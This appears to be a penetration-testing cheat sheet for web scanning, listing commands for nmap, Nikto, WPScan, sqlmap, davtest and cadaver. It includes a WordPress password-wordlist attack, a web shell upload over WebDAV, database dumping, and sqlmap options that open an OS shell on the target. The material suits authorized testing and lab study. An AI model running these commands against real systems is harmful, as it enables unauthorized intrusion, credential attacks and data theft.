Web Scanning

Nmap Script

sudo nmap -p80 --script=http-enum 192.168.1.20

nmap --script=http-vuln* $ip

Banner grabbing

./whatweb $ip 
# identifies all known services

Nikto

Nikto is a very popular and easy to use webserver assessment tool to find potential problems and vulnerabilities quickly. Nikto is written in Perl and comes standard as a tool with Kali Linux.

Personally, I think that Nikto is a great choice to quickly enumerate a webserver, identify the web applications running on it and test for common vulnerabilities.

During the scanning process Nikto searches for potential security problems in the form of misconfigurations, default files and folders, insecure objects and outdated software.

You should know that Nikto is not designed to be stealthy. It scans the target host in the fastest way possible and generates a lot of requests which makes the scanning process very obvious in web server log files and to intrusion detection systems (IDS).

nikto -h $ip
nikto -h $ip -p 80,8080,1234
#test different ports with one scan

-Tuning Options
0 – File Upload
1 – Interesting File / Seen in logs
2 – Misconfiguration / Default File
3 – Information Disclosure
4 – Injection (XSS/Script/HTML)
5 – Remote File Retrieval – Inside Web Root
6 – Denial of Service
7 – Remote File Retrieval – Server Wide
8 – Command Execution / Remote Shell
9 – SQL Injection
a – Authentication Bypass
b – Software Identification
c – Remote Source Inclusion
x – Reverse Tuning Options (i.e., include all except specified)


$ nikto -Display 1234EP -o report.html -Format htm -Tuning 123bde -host 192.168.0.102
# Command

Wordpress scan

WPScan is a popular WordPress vulnerability scanner that can be used to find known vulnerabilities in WordPress, enumerate users, themes and plugins and run dictionary attacks on the user accounts.

WordPress is a very popular blogging platform and is used by numerous websites. The blogging platform is easy to install and can be customized using a lot of (free) plugins and themes. Because of its popularity among bloggers and website owners, it is also a popular target for (black hat) hackers. The reason it’s so popular among hackers is not only because WordPress itself has a long history of severe vulnerabilities, but also because WordPress plugins and themes can introduce vulnerabilities. Website administrators who do not keep up with WordPress updates and do not take appropriate security measures, such as installing Website Application Firewalls (WAFs), can become easy targets that even the most inexperienced hackers can take advantage of.

Sooner or later you will encounter WordPress blogs on penetration testing assignments or maybe you plan to run your own blog someday. Therefore, we will learn how to test a WordPress website for vulnerabilities with WPScan and run some automated tests.

Updating DB of WPScan

wpscan --update

Scanning the target

wpscan --url <ip>

Active Enumeration

Just because WPScan is unable to find plugins with the default scan it doesn’t mean that the WordPress website doesn’t have plugins installed. The default scan option enumerates plugins using passive detection meaning that it only scans the main page and searches for traces of plugins in the HTML content, JavaScript and CSS files.
However, we can also run more aggressive scans with WPScan that actively test WordPress installations for plugins and themes. Depending on the options selected, an active scan tries every plugin from the database to test if it’s present on the target system. Active scans usually yield a much more reliable result. Let’s have a look at the different options available for actively scanning a website for plugins. The following parameters can be used in conjunction with the enumerate option:

p: Scans popular plugins only.
vp: Scans vulnerable plugins only.
ap: Scans all plugins.

To enable the active/aggressive scan option to scan for all plugins we also have to set the aggressive mode using the --plugins-version-detection option.

The same options are available for WordPress themes:

t: Scans popular themes only.
vt: Scans vulnerable themes only.
at: Scans all themes.

wpscan --url [url] --enumerate [p/vp/ap/t/vt/at] --plugins-detection aggressive

To scan for all plugins

wpscan --url [url] --enumerate ap --plugins-detection aggressive

Enumerating wordpress users

wpscan --url [target URL] --enumerate u

Password Attack

wpscan --url http://internal.thm/blog/ --passwords /opt/wordlists/rockyou.txt

Scanning with Api Tokens

wpscan --url https://brainfuck.htb --api-token <redacted>

Disable-tls-checks

wpscan --url https://brainfuck.htb --disable-tls-checks --api-token <redacted>

Backup files search

./bfac --url http://$ip/ --level 4

An automated tool that checks for backup artifacts that may disclose the web-application's source code.

WebDav

Davtest

DAVTest tests WebDAV enabled servers by uploading test executable files, and then (optionally) uploading files which allow for command execution or other actions directly on the target. It is meant for penetration testers to quickly and easily determine if enabled DAV services are exploitable.

davtest --url http://10.11.1.10:80

Cadaver

We can use cadaver client to login into WebDav and can put the web shell to execute

$ cadaver http://192.168.1.103/dav/
put /tmp/shell.php

Uniscan

LFI, RFI, and RCE vulnerability scanner

uniscan -u http://192.168.1.202/ -qd

GIT

Download .git

mkdir <DESTINATION_FOLDER>
./gitdumper.sh <URL>/.git/ <DESTINATION_FOLDER>

Extract .git content

mkdir <EXTRACT_FOLDER>
./extractor.sh <DESTINATION_FOLDER> <EXTRACT_FOLDER>

SQLMap:

Pass the full url with dummy value and the parameter to be attacked

sqlmap -u http://192.168.1.19/blind-sqli.php?user=1 -p user

To dump entire DB:

sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user --dump

Get Reverse shell. Note, post.txt contains the shell code:

sqlmap -r post.txt -p item  --os-shell  --web-root "/var/www/html/tmp"

If you need to pass cookie, use the following:

--cookie="SESSIONID=abcdef123456; USERID=12345"

Dump only a specific table using SQLMAP:

sqlmap -u "http://target.com/page.php?id=1" -D database_name -T table_name --dump

For post requests in SQLMAP:

sqlmap -u "http://example.com/target" --data="user=test" -p user

With Post request in .txt file (copy from Burpsuite)

sqlmap -r request.txt --batch --random-agent

Get OS Shell

sqlmap -r request.txt --os-shell

To test OS command:

sqlmap -r request.txt --os-pwn

Run a command:

sqlmap -r request.txt --os-cmd="whoami"

Exiftool usage:

exiftool -a -u file.pdf

PreviousVuln Scan NextCMS

Last updated 8 months ago

hashtagNmap Script

hashtagBanner grabbing

hashtagNikto

hashtagWordpress scan

hashtagUpdating DB of WPScan

hashtagScanning the target

hashtagActive Enumeration

hashtagEnumerating wordpress users

hashtagPassword Attack

hashtagScanning with Api Tokens

hashtagDisable-tls-checks

hashtagBackup files search

hashtagWebDav

hashtagDavtest

hashtagCadaver

hashtagUniscan

hashtagGIT

hashtagSQLMap:

hashtagExiftool usage: